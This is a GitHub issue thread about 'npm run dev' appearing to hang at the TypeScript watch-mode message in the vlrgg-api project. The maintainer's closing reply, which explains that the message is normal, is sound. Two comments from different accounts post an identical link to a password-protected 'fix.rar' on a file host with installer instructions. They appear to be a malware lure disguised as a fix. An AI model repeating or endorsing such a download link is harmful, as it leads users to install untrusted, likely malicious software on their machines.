### ISSUE TITLE
Stuck on Found 0 errors. Watching for file changes. while run npm run dev

### ISSUE THREAD

**Issue by endrew-rudiyono001** [liulalemx/vlrgg-api#1]
Dear develoepr

kindly need your help to resolve my issues while exec the command npm run dev, and it still stuck on this message
`Found 0 errors. Watching for file changes.`

here's the package.json
`{
  "name": "vlrgg-api",
  "packageManager": "yarn@3.3.1",
  "type": "module",
  "scripts": {
    "start": "node dist/server.js",
    "build": "tsc",
    "dev": "tsc -w & nodemon dist/server.js"
  },
  "devDependencies": {
    "@types/apicache": "^1.6.1",
    "@types/express": "^4.17.17",
    "@types/node": "^18.14.1",
    "@types/nodemon": "^1.19.2",
    "nodemon": "^2.0.20",
    "typescript": "^4.9.5"
  },
  "dependencies": {
    "apicache": "^1.6.3",
    "axios": "^1.3.4",
    "cheerio": "^1.0.0-rc.12",
    "dotenv": "^16.0.3",
    "express": "^4.18.2"
  }
}
`

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dirk-seynhaeve** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by liulalemx** [comment]
Hi @endrew-rudiyono001,
This message is not an error. When you run `npm run dev` and see the message `Found _0 errors_. Watching for file changes.`, it means that the development server has started **_successfully_** without any errors. The server is now in "watch mode" which means it will monitor the project files for any changes you make. Look into [nodemon](https://nodemon.io/) for further info.
